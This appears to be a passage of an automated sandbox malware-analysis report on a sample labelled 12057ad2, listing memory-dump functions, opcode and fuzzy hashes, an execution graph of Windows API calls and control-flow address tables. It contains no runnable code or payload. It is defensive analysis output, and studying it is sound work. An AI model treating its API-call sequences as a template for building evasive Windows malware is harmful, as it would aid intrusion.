                                                • Instruction ID: 4cc81c138aa056da437b3bd33f3aedafa84b9df43ce6c00d93108b44cc4f33df
                                                • Opcode Fuzzy Hash: 402a02647e19cb3a3a11452e14b4a3fcebfcf5d4d3c2909cc108e455123061b9
                                                • Instruction Fuzzy Hash: 2B2107B5608244DFDB24CF10D9C4B26BB65FB88314F24C66DD9894B256C33EDC47CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0061D3C3 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.571968067.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_61d000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 461f3b1088b4801133942b796055613bf01aa916c788f3ba6b35944473f8eacb
                                                • Instruction ID: 4ff3ddba85d8c7558ccce94f2dd2074229c1a0b42a2d2b713c1f2fe2d7102e83
                                                • Opcode Fuzzy Hash: 461f3b1088b4801133942b796055613bf01aa916c788f3ba6b35944473f8eacb
                                                • Instruction Fuzzy Hash: 8011B476504280DFCB15CF10D5C4B96BFB2FB94324F28C6A9D8050B616C336D856CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0074D017 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.572097516.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_74d000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f04ba7eb95aaae6369f92ad73d01107cd86b8e16e4c85f5838a26f24f245082
                                                • Instruction ID: 73d7ca987a03134952938cba126af7e558fd32d665822d5de67c1594e520f2a1
                                                • Opcode Fuzzy Hash: 7f04ba7eb95aaae6369f92ad73d01107cd86b8e16e4c85f5838a26f24f245082
                                                • Instruction Fuzzy Hash: B6118B75504280DFCB25CF14D5D4B15BBA1FB88324F28C6AAD8494B666C33AD84ACBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0074D1CF Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.572097516.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_74d000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f04ba7eb95aaae6369f92ad73d01107cd86b8e16e4c85f5838a26f24f245082
                                                • Instruction ID: f056812d2ab3141ad0ac53d235d7f303e85e672232b15dea9f0f2581f4316c86
                                                • Opcode Fuzzy Hash: 7f04ba7eb95aaae6369f92ad73d01107cd86b8e16e4c85f5838a26f24f245082
                                                • Instruction Fuzzy Hash: FB119D75904280DFCB21CF10D5C4B15FBB1FB84324F28C6ADD8894B656C37AD84ACB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:13.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:334
                                                Total number of Limit Nodes:21
                                                execution_graph 34884 8088008 34885 808802e 34884->34885 34886 8088038 34885->34886 34889 8088258 34885->34889 34887 8088158 34890 808828f 34889->34890 34896 6b2a653 34890->34896 34901 6b2a62f 34890->34901 34906 6b2a3d8 34890->34906 34913 6b2a3e8 34890->34913 34891 80882b3 34897 6b2a666 34896->34897 34920 6b2a921 34897->34920 34923 6b2a928 PostMessageW 34897->34923 34898 6b2a689 34898->34891 34902 6b2a654 34901->34902 34903 6b2a635 34901->34903 34904 6b2a921 PostMessageW 34902->34904 34905 6b2a928 PostMessageW 34902->34905 34903->34891 34904->34903 34905->34903 34907 6b2a442 34906->34907 34908 6b2a4c7 34907->34908 34909 6b2a653 2 API calls 34907->34909 34910 6b2a3e8 2 API calls 34907->34910 34911 6b2a3d8 2 API calls 34907->34911 34912 6b2a62f 2 API calls 34907->34912 34908->34891 34909->34908 34910->34908 34911->34908 34912->34908 34914 6b2a442 34913->34914 34915 6b2a4c7 34914->34915 34916 6b2a653 2 API calls 34914->34916 34917 6b2a3e8 2 API calls 34914->34917 34918 6b2a3d8 2 API calls 34914->34918 34919 6b2a62f 2 API calls 34914->34919 34915->34891 34916->34915 34917->34915 34918->34915 34919->34915 34921 6b2a928 PostMessageW 34920->34921 34922 6b2a994 34921->34922 34922->34898 34924 6b2a994 34923->34924 34924->34898 35222 6b28270 35223 6b28297 35222->35223 35224 6b282f8 35223->35224 35226 dfb674 4 API calls 35223->35226 35227 dfd868 35223->35227 35226->35224 35230 dfd17c 35227->35230 35229 dfd89f 35229->35224 35231 dfd187 35230->35231 35232 dfda11 35231->35232 35234 dfd972 35231->35234 35236 dfda58 4 API calls 35231->35236 35238 dfda70 4 API calls 35231->35238 35239 6b28b22 35231->35239 35244 6b28b48 35231->35244 35232->35229 35233 dfd17c 4 API calls 35233->35234 35234->35232 35234->35233 35236->35234 35238->35234 35240 6b28b48 35239->35240 35242 dfda58 4 API calls 35240->35242 35243 dfda70 4 API calls 35240->35243 35241 6b28b75 35242->35241 35243->35241 35246 dfda58 4 API calls 35244->35246 35247 dfda70 4 API calls 35244->35247 35245 6b28b75 35246->35245 35247->35245 35248 6b244e0 35249 6b244f9 35248->35249 35251 6b24503 35248->35251 35249->35251 35252 6b23588 35249->35252 35253 6b23593 35252->35253 35256 6b2a1ac 35253->35256 35255 6b2ad4a 35255->35251 35258 6b2a1b7 35256->35258 35257 6b2b3be 35257->35255 35258->35257 35259 6b23474 KiUserCallbackDispatcher 35258->35259 35259->35257 35260 6b23de0 35261 6b23e19 35260->35261 35262 6b23eb7 35261->35262 35264 dfda58 4 API calls 35261->35264 35265 dfda70 4 API calls 35261->35265 35263 6b2409f 35262->35263 35268 dfb904 35262->35268 35272 dfcf11 35262->35272 35264->35262 35265->35262 35269 dfb90f 35268->35269 35270 dfb674 4 API calls 35269->35270 35271 dfcfb5 35269->35271 35270->35271 35271->35263 35273 dfcf1c 35272->35273 35274 dfb674 4 API calls 35273->35274 35275 dfcfb5 35273->35275 35274->35275 35275->35263 35284 6b2bdc0 35285 6b2bdd2 35284->35285 35286 6b23474 KiUserCallbackDispatcher 35285->35286 35287 6b2beed 35285->35287 35286->35287 35190 df8b68 35191 df8b77 35190->35191 35194 df9058 35190->35194 35202 df9068 35190->35202 35195 df905c 35194->35195 35196 df9093 35195->35196 35210 df92f0 35195->35210 35214 df92e0 35195->35214 35196->35191 35197 df908b 35197->35196 35198 df9290 GetModuleHandleW 35197->35198 35199 df92bd 35198->35199 35199->35191 35203 df907b 35202->35203 35204 df9093 35203->35204 35208 df92f0 LoadLibraryExW 35203->35208 35209 df92e0 LoadLibraryExW 35203->35209 35204->35191 35205 df908b 35205->35204 35206 df9290 GetModuleHandleW 35205->35206 35207 df92bd 35206->35207 35207->35191 35208->35205 35209->35205 35211 df9304 35210->35211 35212 df9329 35211->35212 35218 df8c94 35211->35218 35212->35197 35215 df92e4 35214->35215 35216 df9329 35215->35216 35217 df8c94 LoadLibraryExW 35215->35217 35216->35197 35217->35216 35219 df94d0 LoadLibraryExW 35218->35219 35221 df9549 35219->35221 35221->35212 35276 8087c50 35277 8087c6d 35276->35277 35280 80873d8 35277->35280 35281 80873e3 35280->35281 35282 8087c9c 35281->35282 35283 8088258 2 API calls 35281->35283 35283->35282 34925 6b24db8 34926 6b24e00 SetWindowTextW 34925->34926 34927 6b24dfa 34925->34927 34928 6b24e31 34926->34928 34927->34926 34929 6b261b8 34930 6b261d8 34929->34930 34934 6b26200 SendMessageW 34930->34934 34936 6b261fe SendMessageW 34930->34936 34931 6b261e9 34935 6b2626c 34934->34935 34935->34931 34937 6b2626c 34936->34937 34937->34931 34938 6b28d38 34939 6b28d58 34938->34939 34941 6b28e69 34938->34941 34942 6b28e72 34941->34942 34944 6b28e00 34941->34944 34947 6b28ea8 34942->34947 34952 6b28e99 34942->34952 34943 6b28e94 34943->34939 34944->34939 34948 6b28eb8 34947->34948 34950 6b26200 SendMessageW 34948->34950 34951 6b261fe SendMessageW 34948->34951 34949 6b28ec9 34949->34943 34950->34949 34951->34949 34953 6b28eb8 34952->34953 34955 6b26200 SendMessageW 34953->34955 34956 6b261fe SendMessageW 34953->34956 34954 6b28ec9 34954->34943 34955->34954 34956->34954 34957 dfb050 34958 dfb0b6 34957->34958 34959 dfb165 34958->34959 34962 dfb210 34958->34962 34965 dfb200 34958->34965 34969 df9020 34962->34969 34966 dfb204 34965->34966 34967 df9020 DuplicateHandle 34966->34967 34968 dfb23e 34966->34968 34967->34968 34968->34959 34970 dfb278 DuplicateHandle 34969->34970 34971 dfb23e 34970->34971 34971->34959 34972 df4170 34979 df418d 34972->34979 34973 df41b0 34982 df3d34 34973->34982 34975 df41c6 34986 6b23060 34975->34986 34991 6b2304f 34975->34991 34976 df41cf 34977 df41d4 34978 df3d34 9 API calls 34977->34978 34978->34976 34979->34973 34979->34977 34983 df3d3f 34982->34983 34996 df3d44 34983->34996 34985 df433e 34985->34975 34987 6b23072 34986->34987 35113 6b23168 34987->35113 35118 6b23159 34987->35118 34992 6b23060 34991->34992 34994 6b23168 11 API calls 34992->34994 34995 6b23159 11 API calls 34992->34995 34993 6b23092 34993->34976 34994->34993 34995->34993 34997 df3d4f 34996->34997 35000 df3910 34997->35000 34999 df43e5 34999->34985 35001 df391b 35000->35001 35004 df3940 35001->35004 35003 df44c2 35003->34999 35005 df394b 35004->35005 35008 df3f70 35005->35008 35007 df45d1 35007->35003 35009 df3f7b 35008->35009 35015 df6538 35009->35015 35011 df697b 35012 df6ba4 35011->35012 35021 dfac70 35011->35021 35026 dfac80 35011->35026 35012->35007 35016 df6543 35015->35016 35017 df770a 35016->35017 35031 df76e8 35016->35031 35041 df7768 35016->35041 35045 df7758 35016->35045 35017->35011 35022 dfac74 35021->35022 35023 dfacc5 35022->35023 35049 dfaf2b 35022->35049 35053 dfaf38 35022->35053 35023->35012 35027 dfaca1 35026->35027 35028 dfacc5 35027->35028 35029 dfaf2b 9 API calls 35027->35029 35030 dfaf38 9 API calls 35027->35030 35028->35012 35029->35028 35030->35028 35032 df76ec 35031->35032 35033 df76f3 35032->35033 35034 df7764 35032->35034 35037 df770a 35033->35037 35038 df76e8 2 API calls 35033->35038 35039 df7758 KiUserCallbackDispatcher 35033->35039 35040 df7768 KiUserCallbackDispatcher 35033->35040 35035 df77b6 KiUserCallbackDispatcher 35034->35035 35036 df77e0 35034->35036 35035->35036 35036->35017 35037->35017 35038->35037 35039->35037 35040->35037 35042 df77ab 35041->35042 35043 df77b6 KiUserCallbackDispatcher 35042->35043 35044 df77e0 35042->35044 35043->35044 35044->35017 35046 df775c 35045->35046 35047 df77b6 KiUserCallbackDispatcher 35046->35047 35048 df77e0 35046->35048 35047->35048 35048->35017 35050 dfaf34 35049->35050 35051 dfaf7f 35050->35051 35057 df8f98 35050->35057 35051->35023 35054 dfaf45 35053->35054 35055 dfaf7f 35054->35055 35056 df8f98 9 API calls 35054->35056 35055->35023 35056->35055 35058 df8fa3 35057->35058 35060 dfbc78 35058->35060 35061 df903c 35058->35061 35060->35060 35062 df9047 35061->35062 35063 df3f70 9 API calls 35062->35063 35064 dfbce7 35063->35064 35065 dfbcf5 35064->35065 35075 dfbd51 35064->35075 35082 dfbd60 35064->35082 35089 dfb664 35065->35089 35067 dfbd0f 35094 dfb674 35067->35094 35069 dfbd16 35098 dfda70 35069->35098 35106 dfda58 35069->35106 35070 dfbd20 35070->35060 35076 dfbd8e 35075->35076 35077 dfbe5f 35076->35077 35078 dfbdcf 35076->35078 35081 dfbecb 35076->35081 35079 dfb674 LoadLibraryExW GetModuleHandleW CreateWindowExW CreateWindowExW 35077->35079 35077->35081 35080 dfbe5a KiUserCallbackDispatcher 35078->35080 35078->35081 35079->35081 35080->35081 35083 dfbd8e 35082->35083 35084 dfbe5f 35083->35084 35086 dfbdcf 35083->35086 35088 dfbecb 35083->35088 35085 dfb674 LoadLibraryExW GetModuleHandleW CreateWindowExW CreateWindowExW 35084->35085 35084->35088 35085->35088 35087 dfbe5a KiUserCallbackDispatcher 35086->35087 35086->35088 35087->35088 35091 dfb66f 35089->35091 35090 dfb904 LoadLibraryExW GetModuleHandleW CreateWindowExW CreateWindowExW 35092 dfce84 35090->35092 35091->35090 35093 dfce89 35091->35093 35092->35067 35093->35067 35095 dfb67f 35094->35095 35096 dfd17c LoadLibraryExW GetModuleHandleW CreateWindowExW CreateWindowExW 35095->35096 35097 dfd89f 35095->35097 35096->35097 35097->35069 35100 dfdaa1 35098->35100 35101 dfdb93 35098->35101 35099 dfdaad 35099->35070 35100->35099 35102 dfdaee 35100->35102 35103 dfddb8 LoadLibraryExW GetModuleHandleW 35100->35103 35101->35070 35104 dfe777 CreateWindowExW CreateWindowExW 35102->35104 35105 dfe780 CreateWindowExW CreateWindowExW 35102->35105 35103->35102 35104->35101 35105->35101 35107 dfda68 35106->35107 35108 dfdaee 35107->35108 35109 dfdaad 35107->35109 35112 dfddb8 LoadLibraryExW GetModuleHandleW 35107->35112 35110 dfe777 CreateWindowExW CreateWindowExW 35108->35110 35111 dfe780 CreateWindowExW CreateWindowExW 35108->35111 35109->35070 35110->35109 35111->35109 35112->35108 35114 6b23190 35113->35114 35123 6b235f0 35114->35123 35132 6b235e1 35114->35132 35115 6b231a5 35119 6b23162 35118->35119 35120 6b231a5 35118->35120 35121 6b235f0 11 API calls 35119->35121 35122 6b235e1 11 API calls 35119->35122 35120->35120 35121->35120 35122->35120 35128 6b23615 35123->35128 35124 6b236be 35125 6b23314 7 API calls 35124->35125 35126 6b23814 35124->35126 35125->35126 35127 6b2384e 35126->35127 35146 808058c 35126->35146 35153 8080598 35126->35153 35127->35115 35128->35124 35128->35127 35141 6b23314 35128->35141 35133 6b235f0 35132->35133 35136 6b23314 7 API calls 35133->35136 35137 6b236be 35133->35137 35138 6b2384e 35133->35138 35134 6b23314 7 API calls 35135 6b23814 35134->35135 35135->35138 35139 8080598 4 API calls 35135->35139 35140 808058c 4 API calls 35135->35140 35136->35137 35137->35134 35137->35135 35138->35115 35139->35138 35140->35138 35142 6b2331f 35141->35142 35160 6b23a60 35142->35160 35168 6b23a50 35142->35168 35143 6b23a4b 35143->35124 35148 8080598 35146->35148 35147 808064a 35147->35127 35148->35147 35180 8080b58 35148->35180 35183 8080b60 PeekMessageW 35148->35183 35185 8081b78 35148->35185 35188 8081b80 DispatchMessageW 35148->35188 35155 80805fd 35153->35155 35154 808064a 35154->35127 35155->35154 35156 8080b58 PeekMessageW 35155->35156 35157 8080b60 PeekMessageW 35155->35157 35158 8081b78 DispatchMessageW 35155->35158 35159 8081b80 DispatchMessageW 35155->35159 35156->35155 35157->35155 35158->35155 35159->35155 35161 6b23a86 35160->35161 35162 6b23a9a 35161->35162 35165 6b23b85 35161->35165 35166 dfbd51 5 API calls 35161->35166 35167 dfbd60 5 API calls 35161->35167 35162->35143 35163 6b23d3f 35163->35143 35165->35163 35176 6b23474 35165->35176 35166->35165 35167->35165 35170 6b23a60 35168->35170 35169 6b23a9a 35169->35143 35170->35169 35173 6b23b85 35170->35173 35174 dfbd51 5 API calls 35170->35174 35175 dfbd60 5 API calls 35170->35175 35171 6b23d3f 35171->35143 35172 6b23474 KiUserCallbackDispatcher 35172->35171 35173->35171 35173->35172 35174->35173 35175->35173 35178 6b2347f 35176->35178 35177 6b2ce9e 35177->35163 35178->35177 35179 6b2ce9c KiUserCallbackDispatcher 35178->35179 35179->35177 35181 8080b60 PeekMessageW 35180->35181 35182 8080bd7 35181->35182 35182->35148 35184 8080bd7 35183->35184 35184->35148 35186 8081b80 DispatchMessageW 35185->35186 35187 8081bec 35186->35187 35187->35148 35189 8081bec 35188->35189 35189->35148

                                                Executed Functions

                                                Function 00DFF420 Relevance: 1.8, APIs: 1, Instructions: 282COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 228 dff420-dff422 229 dff426-dff432 228->229 230 dff424 228->230 231 dff434-dff462 229->231 230->229 232 dff466-dff482 231->232 233 dff464 231->233 234 dff486-dff48a 232->234 235 dff484 232->235 233->232 236 dff48e-dff4a2 234->236 237 dff48c 234->237 235->234 238 dff4a6-dff4aa 236->238 239 dff4a4 236->239 237->231 237->236 240 dff4ae-dff4c2 238->240 241 dff4ac 238->241 239->238 242 dff4c6-dff4ca 240->242 243 dff4c4 240->243 241->240 244 dff4ce-dff4e2 242->244 245 dff4cc-dff4cd 242->245 243->242 246 dff4e6-dff4ea 244->246 247 dff4e4 244->247 245->244 248 dff4ee-dff502 246->248 249 dff4ec 246->249 247->246 250 dff506-dff50a 248->250 251 dff504 248->251 249->248 252 dff50e-dff522 250->252 253 dff50b-dff50d 250->253 251->250 254 dff526-dff52f 252->254 255 dff524 252->255 253->252 256 dff565-dff572 254->256 257 dff531-dff558 call dfd33c 254->257 255->254 259 dff576 256->259 260 dff574 256->260 261 dff55d-dff55e 257->261 262 dff57c-dff5de 259->262 263 dff578-dff57b 259->263 260->259 264 dff5e9-dff5f0 262->264 265 dff5e0-dff5e6 262->265 263->262 266 dff5fb-dff69a CreateWindowExW 264->266 267 dff5f2-dff5f8 264->267 265->264 269 dff69c-dff6a2 266->269 270 dff6a3-dff6db 266->270 267->266 269->270 274 dff6dd-dff6e0 270->274 275 dff6e8 270->275 274->275 276 dff6e9 275->276 276->276
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba0be97d743dadf86c1fc98e5767d87cb7067561ba74b6c08392ec1c62916749
                                                • Instruction ID: 27b7ac36d478703e0285602280f6538e140df644424b8abe1a714852a0e882db
                                                • Opcode Fuzzy Hash: ba0be97d743dadf86c1fc98e5767d87cb7067561ba74b6c08392ec1c62916749
                                                • Instruction Fuzzy Hash: D3A18071C0938D9FCF06CFA5D8509EDBFB1EF1A310F1A81AAE544AB262D7305845CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DF9068 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 277 df9068-df9070 278 df907b-df907d 277->278 279 df9076 call df7bf8 277->279 280 df907f 278->280 281 df9093-df9097 278->281 279->278 335 df9085 call df92f0 280->335 336 df9085 call df92e0 280->336 282 df90ab-df90ec 281->282 283 df9099-df90a3 281->283 288 df90ee-df90f6 282->288 289 df90f9-df9107 282->289 283->282 284 df908b-df908d 284->281 286 df91c8-df9242 284->286 325 df9246-df9288 286->325 326 df9244 286->326 288->289 290 df912b-df912d 289->290 291 df9109-df910e 289->291 293 df9130-df9137 290->293 294 df9119 291->294 295 df9110-df9117 call df7c04 291->295 298 df9139-df9141 293->298 299 df9144-df914b 293->299 296 df911b-df9129 294->296 295->296 296->293 298->299 302 df914d-df9155 299->302 303 df9158-df9161 call df8c54 299->303 302->303 307 df916e-df9173 303->307 308 df9163-df916b 303->308 310 df9175-df917c 307->310 311 df9191-df9195 307->311 308->307 310->311 313 df917e-df918e call df8c64 call df8c74 310->313 333 df9198 call df95e8 311->333 334 df9198 call df95c0 311->334 313->311 315 df919b-df919e 318 df91c1-df91c7 315->318 319 df91a0-df91be 315->319 319->318 328 df928a-df928d 325->328 329 df9290-df92bb GetModuleHandleW 325->329 326->325 328->329 330 df92bd-df92c3 329->330 331 df92c4-df92d8 329->331 330->331 333->315 334->315 335->284 336->284
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00DF92AE
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 904056f1896cc518521934c3b9bdf84712ff3d0ff5aa6fe4749eccf2e05e6a89
                                                • Instruction ID: d1787089335e9568b1d5d5da06e3ce0d0bd1ace44818f9a486dba960f8f119e0
                                                • Opcode Fuzzy Hash: 904056f1896cc518521934c3b9bdf84712ff3d0ff5aa6fe4749eccf2e05e6a89
                                                • Instruction Fuzzy Hash: 44713270A00B099FDB24DF2AD4547AAB7F1FF88304F05892DD68AC7A50DB34E8458BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DFD320 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 337 dfd320-dfd32a 339 dfd32c-dfd32e 337->339 340 dfd330-dff5de 337->340 339->340 345 dff5e9-dff5f0 340->345 346 dff5e0-dff5e6 340->346 347 dff5fb-dff633 345->347 348 dff5f2-dff5f8 345->348 346->345 349 dff63b-dff69a CreateWindowExW 347->349 348->347 350 dff69c-dff6a2 349->350 351 dff6a3-dff6db 349->351 350->351 355 dff6dd-dff6e0 351->355 356 dff6e8 351->356 355->356 357 dff6e9 356->357 357->357
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00DFF68A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 7897fe3868b99e61a1d4531845dcc2cd9d863b315c893e7aeeaa767df1988ea7
                                                • Instruction ID: 5ff432872f667f4e615b15c384a4d74838edf8aee92db3353900c6becc1ee825
                                                • Opcode Fuzzy Hash: 7897fe3868b99e61a1d4531845dcc2cd9d863b315c893e7aeeaa767df1988ea7
                                                • Instruction Fuzzy Hash: 395101B1C04349AFDB15CFA9C880ADEBFB1BF49314F25816AE509AB221D7709845CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DFF56C Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 358 dff56c-dff5de 360 dff5e9-dff5f0 358->360 361 dff5e0-dff5e6 358->361 362 dff5fb-dff633 360->362 363 dff5f2-dff5f8 360->363 361->360 364 dff63b-dff69a CreateWindowExW 362->364 363->362 365 dff69c-dff6a2 364->365 366 dff6a3-dff6db 364->366 365->366 370 dff6dd-dff6e0 366->370 371 dff6e8 366->371 370->371 372 dff6e9 371->372 372->372
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00DFF68A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 35d3609eafabd3755beaf40a1504c3a9db9ac9a9389728b4853a8dacd5e6a593
                                                • Instruction ID: ab60191484f471687e65fee0c97210e50f6649ab335d76f09504e8532663e3e6
                                                • Opcode Fuzzy Hash: 35d3609eafabd3755beaf40a1504c3a9db9ac9a9389728b4853a8dacd5e6a593
                                                • Instruction Fuzzy Hash: 1451DFB1D00309AFDB14CFAAC884ADEBBB5BF48314F25812AE919AB210D7759945CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DFD33C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 373 dfd33c-dff5de 376 dff5e9-dff5f0 373->376 377 dff5e0-dff5e6 373->377 378 dff5fb-dff69a CreateWindowExW 376->378 379 dff5f2-dff5f8 376->379 377->376 381 dff69c-dff6a2 378->381 382 dff6a3-dff6db 378->382 379->378 381->382 386 dff6dd-dff6e0 382->386 387 dff6e8 382->387 386->387 388 dff6e9 387->388 388->388
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00DFF68A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: ef694ee064a4ace76e52c0816f5e62a048de51640bca35c5e04141effcf22231
                                                • Instruction ID: 31afce05873970e2ee6fa6e8afb2ecc37102bfed228f4be5bbb9d9cdb527ba2e
                                                • Opcode Fuzzy Hash: ef694ee064a4ace76e52c0816f5e62a048de51640bca35c5e04141effcf22231
                                                • Instruction Fuzzy Hash: 2351C0B1D00309AFDB14CF99C884ADEBBB5BF48314F25812AE519AB210D775A945CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DF76E8 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 389 df76e8-df76ea 390 df76ee-df76f1 389->390 391 df76ec 389->391 392 df7764-df77b4 390->392 393 df76f3-df7702 390->393 391->390 398 df77b6-df77de KiUserCallbackDispatcher 392->398 399 df7802-df781b 392->399 394 df7704 393->394 395 df7750-df7751 393->395 411 df7704 call df76e8 394->411 412 df7704 call df7758 394->412 413 df7704 call df7768 394->413 397 df770a-df771e 400 df7749 397->400 401 df7720-df7733 call df689c 397->401 402 df77e7-df77fb 398->402 403 df77e0-df77e6 398->403 400->395 401->400 407 df7735-df7742 call df4e28 401->407 402->399 403->402 407->400 410 df7744 407->410 410->400 411->397 412->397 413->397
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 01b821514c02d544494fc90625f2336a11b4880a8c0f8413f9489691d77909f9
                                                • Instruction ID: 244c7989fbe6dfdea168f132e6d133e299e80b31ef2018317bc785be6da5e39c
                                                • Opcode Fuzzy Hash: 01b821514c02d544494fc90625f2336a11b4880a8c0f8413f9489691d77909f9
                                                • Instruction Fuzzy Hash: 4C31E170904388CEDB11DF65E4483EA7FF4EB05318F09849ED546AB242C738AA85CB71
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DF9020 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 414 df9020-dfb30c DuplicateHandle 416 dfb30e-dfb314 414->416 417 dfb315-dfb332 414->417 416->417
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00DFB23E,?,?,?,?,?), ref: 00DFB2FF
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: a1873e51a5c5383262f8e75c01970ace8dd54ee0f4b1eba4b69992832f6ca199
                                                • Instruction ID: 93acd37b9d7fe9c47f39bd1b97f614b848b286c072f32271e8264d264ef70398
                                                • Opcode Fuzzy Hash: a1873e51a5c5383262f8e75c01970ace8dd54ee0f4b1eba4b69992832f6ca199
                                                • Instruction Fuzzy Hash: D621E5B5900208AFDB10CF99D884BEEFBF4FB48324F15845AE955A7310D374A954CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DFB270 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 420 dfb270-dfb272 421 dfb276-dfb30c DuplicateHandle 420->421 422 dfb274 420->422 423 dfb30e-dfb314 421->423 424 dfb315-dfb332 421->424 422->421 423->424
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00DFB23E,?,?,?,?,?), ref: 00DFB2FF
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
